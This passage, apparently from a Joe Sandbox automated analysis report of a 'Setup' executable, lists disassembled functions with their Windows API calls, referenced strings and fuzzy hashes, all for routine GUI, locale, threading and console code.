Instruction Fuzzy Hash: B7218C31244304AFDB24BF60DD8AF697BA8FF45B05F204059E911DB296DBB2B805CF94

Function 00820430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008209E0: GetProcAddress.KERNEL32(SetWindowTheme), ref: 00820AAD
Part of subcall function 008209E0: SendMessageW.USER32(?,00001036,00010000,00010000), ref: 00820AF8

CreateWindowExW.USER32(80000000,SysListView32,?,00000000,?,80000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00820482
SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 0082049A
SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 008204A6

Part of subcall function 006F9F60: SetWindowLongW.USER32(?,000000FC,00000000), ref: 006F9FA2

Strings

SysListView32, xrefs: 00820479

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: MessageSend$Window$AddressCreateLongProc
String ID: SysListView32
API String ID: 5470851-78025650
Opcode ID: 02e716dc23e1e4f36dc13d8cd7d077e213a4ee9816a09cf94ea3801ae240f487
Instruction ID: ef1f13816997ff981963115b1623f89a11d155ec89874175cd3aee59d911d810
Opcode Fuzzy Hash: 02e716dc23e1e4f36dc13d8cd7d077e213a4ee9816a09cf94ea3801ae240f487
Instruction Fuzzy Hash: 3F118E31301211BFE6159B55CC05F5BFBA9FFC9B50F044219FA05A72A1C7B1AD81CBA1

Function 006F24D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51memorywindowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00001300,00000000,?,00000400,00000000,00000000,00000000), ref: 006F2527
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,0093E676,000000FF), ref: 006F254F
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,0093E676,000000FF), ref: 006F2555

Strings

&_', xrefs: 006F24E5

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Heap$FormatFreeMessageProcess
String ID: &_'
API String ID: 3399813933-2411122644
Opcode ID: 89977ea2da5b7d88e15dbc02f712ecd04cc3aeef2ec4f41b2e8fe9f1b32eaad7
Instruction ID: 0b5ccbe1409075d5318f23e515613800e9f6ef950814912a4b7b70a7831768fd
Opcode Fuzzy Hash: 89977ea2da5b7d88e15dbc02f712ecd04cc3aeef2ec4f41b2e8fe9f1b32eaad7
Instruction Fuzzy Hash: 831161B1A44259ABEB10DF94CC16BAFBBB8EB04B18F104519F910A73C0D7B59A048BD5

Function 0091637C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0091632D,?,?,00000000,?,?,?,00916457,00000002,FlsGetValue,009CD5B8,FlsGetValue), ref: 00916389
GetLastError.KERNEL32(?,0091632D,?,?,00000000,?,?,?,00916457,00000002,FlsGetValue,009CD5B8,FlsGetValue,?,?,0091323B), ref: 00916393
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 009163BB

Strings

api-ms-, xrefs: 009163A0

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: f8368f908a81c625028a573981f152a0f6d10b6efa83a1d8b6f0108644300998
Instruction ID: 66c7a0290b721e7f18f8bf8f2a6f99d2131a4f190c0dc5495ab094e7214d3594
Opcode Fuzzy Hash: f8368f908a81c625028a573981f152a0f6d10b6efa83a1d8b6f0108644300998
Instruction Fuzzy Hash: BBE04F31B88209F7FB101BA1EC07F997B69AF01B54F104031FA1DA80E1D7669A959694

Function 00882650 Relevance: 6.1, APIs: 4, Instructions: 69synchronizationCOMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?,?,00000000,00000000,00881872,?,?,?,?,?,00000003,00000000,275F26E1,?,00000000), ref: 00882663
GetLastError.KERNEL32(?,?,00000000,00000000,00881872,?,?,?,?,?,00000003,00000000,275F26E1,?,00000000), ref: 00882690
WaitForSingleObject.KERNEL32(?,0000000A,?,?,00000000,00000000,00881872,?,?,?,?,?,00000003,00000000,275F26E1), ref: 008826CA
SetEvent.KERNEL32(?,?,?,00000000,00000000,00881872,?,?,?,?,?,00000003,00000000,275F26E1,?,00000000), ref: 008826F3

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Event$ErrorLastObjectResetSingleWait
String ID:
API String ID: 708712559-0
Opcode ID: 86e37e49f3be2c281cd19f1595b9e22de67812d3dcac42ebdabb73e1e8b0b06f
Instruction ID: 87b2f5cdd5e872990b94215261ab3e94d129cb97dce6c522f89ead07e085e549
Opcode Fuzzy Hash: 86e37e49f3be2c281cd19f1595b9e22de67812d3dcac42ebdabb73e1e8b0b06f
Instruction Fuzzy Hash: 7311D3362157048FDB20AB55EC88B17BB94FF65326F00482EE083C2561D770E895EB60

Function 006F0F60 Relevance: 6.1, APIs: 4, Instructions: 62threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 006F0F70

Part of subcall function 0090E62E: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,006F0F86,?,00000000,00000000), ref: 0090E63A
Part of subcall function 0090E62E: GetExitCodeThread.KERNEL32(?,00000000,?,?,?,006F0F86,?,00000000,00000000), ref: 0090E653
Part of subcall function 0090E62E: CloseHandle.KERNEL32(?,?,?,?,006F0F86,?,00000000,00000000), ref: 0090E665

std::_Throw_Cpp_error.LIBCPMT ref: 006F0F99
std::_Throw_Cpp_error.LIBCPMT ref: 006F0FA0
std::_Throw_Cpp_error.LIBCPMT ref: 006F0FA7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$Thread$CloseCodeCurrentExitHandleObjectSingleWait
String ID:
API String ID: 2210105531-0
Opcode ID: b943163ab7b24258de21e3f8e9a3faa87af87ac505a1c6fe633db96d54539a2d
Instruction ID: 8970f7a003cfafba8bee64f87c5a638dab7887aab17417fee9c04eb8fd6f4ef9
Opcode Fuzzy Hash: b943163ab7b24258de21e3f8e9a3faa87af87ac505a1c6fe633db96d54539a2d
Instruction Fuzzy Hash: 83118C31501318AFEB343BA09C077A97395EF80B21F104918FA68175C2EFB169408682

Function 0090EEF4 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0090EEFB
std::_Lockit::_Lockit.LIBCPMT ref: 0090EF06
std::_Lockit::~_Lockit.LIBCPMT ref: 0090EF74

Part of subcall function 0090F057: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0090F06F

std::locale::_Setgloballocale.LIBCPMT ref: 0090EF21

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
String ID:
API String ID: 677527491-0
Opcode ID: 496133c3eb15aabe5389fb968204aeece4ea293e977940f314a1b4f8e374eed7
Instruction ID: 500f56eed431877cd6879b023a909c9a2b44c974c9edb5fff288ebf6377276a6
Opcode Fuzzy Hash: 496133c3eb15aabe5389fb968204aeece4ea293e977940f314a1b4f8e374eed7
Instruction Fuzzy Hash: 7901B835A002219FCB0AEFA0D855ABC7BB1FFC1B50B154009E926573D2CF74AA86DBC1

Function 00938A27 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,0091D722,00000000,00000000,?,00937119,00000000,00000001,?,?,?,0092CE64,?,00000000,00000000), ref: 00938A3E
GetLastError.KERNEL32(?,00937119,00000000,00000001,?,?,?,0092CE64,?,00000000,00000000,?,?,?,0092D43E,00000000), ref: 00938A4A

Part of subcall function 00938A10: CloseHandle.KERNEL32(FFFFFFFE,00938A5A,?,00937119,00000000,00000001,?,?,?,0092CE64,?,00000000,00000000,?,?), ref: 00938A20

___initconout.LIBCMT ref: 00938A5A

Part of subcall function 009389C7: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,009389F6,00937106,?,?,0092CE64,?,00000000,00000000,?), ref: 009389DA

WriteConsoleW.KERNEL32(00000000,00000000,0091D722,00000000,?,00937119,00000000,00000001,?,?,?,0092CE64,?,00000000,00000000,?), ref: 00938A6F

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: b9072181da66621d5b34548a746c2e672ffb800de0cda8695097b06e752cbeb3
Instruction ID: 83454e0630d4ac4e013386e7ae3fce514c880f1a1952120e9ee773b72e441352
Opcode Fuzzy Hash: b9072181da66621d5b34548a746c2e672ffb800de0cda8695097b06e752cbeb3
Instruction Fuzzy Hash: 43F03036004214BBCF221FD5EC09A9A7F66FF493A1F014450FE0996130CA328920FFE1

Function 00894EF0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 384COMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

Part of subcall function 006EA7A0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,0088A498,\\.\pipe\ToServer,?,00000000,?,?,00941D06,000000FF,?,00889991), ref: 006EA7C3

GetTickCount.KERNEL32 ref: 008952FC

Strings

&_', xrefs: 00894F07
0123456789AaBbCcDdEeFf, xrefs: 00894F5B, 00894F6D, 00894F77

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CountFindHeapProcessResourceTick
String ID: 0123456789AaBbCcDdEeFf$&_'
API String ID: 620770961-1111227313
Opcode ID: 878dc8c0014372fe0b4ca6faa982270e1af79a48ea866270e9130c16237b228a
Instruction ID: f6612c2fde9a1abe4f96017e4b03be09a797593e1cf13227d9eb75beabdd193c
Opcode Fuzzy Hash: 878dc8c0014372fe0b4ca6faa982270e1af79a48ea866270e9130c16237b228a
Instruction Fuzzy Hash: B2E1B571A04A059FCF05EF68C889BAEB7A5FF49324F184259E815DB381DB74ED41CB90

Function 00701140 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,00000033,?,?,009D3180,00000000,?,80000001,00000000,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033,275F26E1,?,?), ref: 0070131D

Strings

AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 00701199
&_', xrefs: 0070116B, 00701374

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Close
String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$&_'
API String ID: 3535843008-527411964
Opcode ID: 4b5c292285271764d0565c55ae056c50207db8607c059046c3dc8c8bee3797d5
Instruction ID: 62b547ed55a661b0d0b4fe09871743c96e949a56083b7a9971994c553b289732
Opcode Fuzzy Hash: 4b5c292285271764d0565c55ae056c50207db8607c059046c3dc8c8bee3797d5
Instruction Fuzzy Hash: A2B1C271D00248DFCB14DFA8C855BEEB7F5FF84314F608219E415A7691EB38AA84CB90

Function 00823220 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 267windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

SetWindowTextW.USER32(?,?), ref: 008234A6
SendMessageW.USER32(?,00000437,00000000,?), ref: 008234C9

Strings

&_', xrefs: 00823234

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: HeapMessageProcessSendTextWindow
String ID: &_'
API String ID: 520661011-2411122644
Opcode ID: d718c5e4cb970328c6515dc2a56f4ff3c452b87aa093ce3e91110c9795dcc366
Instruction ID: 5c3a052e1f843b59966e4cb6e6b0dff9f6d0e21d86b82aa1f99f51280796eef8
Opcode Fuzzy Hash: d718c5e4cb970328c6515dc2a56f4ff3c452b87aa093ce3e91110c9795dcc366
Instruction Fuzzy Hash: ABA1C275A00218DFCB04DFA8E8A5AADB7B5FF48314F19416DE816EB391DB34AE41CB50

Function 0070B260 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000001), ref: 0070B2FD
SendMessageW.USER32(00000000,00000138,?,00000001), ref: 0070B30D

Strings

&_', xrefs: 0070B288

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: MessageParentSend
String ID: &_'
API String ID: 928151917-2411122644
Opcode ID: f6614a78a8af6653fa9e24f335362f548f6a352da1354a9b15fef78ce11813af
Instruction ID: 5f88b3dec0fc00d29683fe631d82a5daacb38d2e3d025add21611eba28618c13
Opcode Fuzzy Hash: f6614a78a8af6653fa9e24f335362f548f6a352da1354a9b15fef78ce11813af
Instruction Fuzzy Hash: DF912CB1A00619EFDB15CFA9CD04AAEBBF5FF08300F148229E915E7690D735AA55CB90

Function 00854D60 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00854EF7

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

OutputDebugStringW.KERNEL32(?,275F26E1,00000000,?,00000000,?,00000000,009891BD,000000FF,?,0085E1B9,?), ref: 00854FA8

Strings

&_', xrefs: 00854D77

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ActiveDebugHeapOutputProcessStringWindow
String ID: &_'
API String ID: 1561562072-2411122644
Opcode ID: 599df7be5aef69f0496efe68a2c47c7fe624515848edd1fa0fa3fbb052dc13a1
Instruction ID: 26513e98abd555e5614c1e6792571edf97208804815ce49b5baa5de0e351289b
Opcode Fuzzy Hash: 599df7be5aef69f0496efe68a2c47c7fe624515848edd1fa0fa3fbb052dc13a1
Instruction Fuzzy Hash: 4171EE75A042098FCB05DBACC8456AEBBB6FF88325F19419DEC15E7390DB34AD46CB90

Function 0084CF00 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 219COMMON

Download Yara Rule

APIs

SymCleanup.IMAGEHLP(?,275F26E1,?,00000000,Function_0025C6B0,000000FF), ref: 0084D18C

Strings

, xrefs: 0084CF94, 0084CFB6, 0084D042, 0084D064
&_', xrefs: 0084CF14, 0084D172

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Cleanup
String ID: $&_'
API String ID: 99945797-1946656150
Opcode ID: d549c645ec7a9bcacd647a8339481410b907b4fecd678068a29f66076353e94f
Instruction ID: 12ac7dc24b0c47175a3e8dfc428bfda06f775d0d62e4cafb6124f0c3b48e253c
Opcode Fuzzy Hash: d549c645ec7a9bcacd647a8339481410b907b4fecd678068a29f66076353e94f
Instruction Fuzzy Hash: 5781AAB1E00358EFDB14DFA8C845BADBBB4FF54714F040259E815AB291DBB1AE44CB90

Function 00843220 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 213COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,275F26E1,?,?,000000FF,?,008431EF,00000000), ref: 00843278
WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00843315

Strings

&_', xrefs: 00843236

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: &_'
API String ID: 626452242-2411122644
Opcode ID: fd3c77e4383ffabd804bead28ca51e062f0575b10a7c72e0000953cf836cfa3f
Instruction ID: 3a1f9e2d9200c8c04fa35be832a9509d8a7d5b636c97b2b4956e03f5515eb8ad
Opcode Fuzzy Hash: fd3c77e4383ffabd804bead28ca51e062f0575b10a7c72e0000953cf836cfa3f
Instruction Fuzzy Hash: 0F819F71E0064AABEB15CF68C8047EEFBB5FF54314F248219E810B7781D7B56A948BE4

Function 00826560 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

GetShortPathNameW.KERNEL32(?,?,00000105), ref: 00826684

Strings

\\?\, xrefs: 0082661B, 00826636, 008266BC
&_', xrefs: 0082658B

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: NamePathShort
String ID: \\?\$&_'
API String ID: 1295925010-1284244155
Opcode ID: 370ff79ed4ac6d2ed3653e0e0fa3c6a9edaed822111a5261e5568a9868e90a12
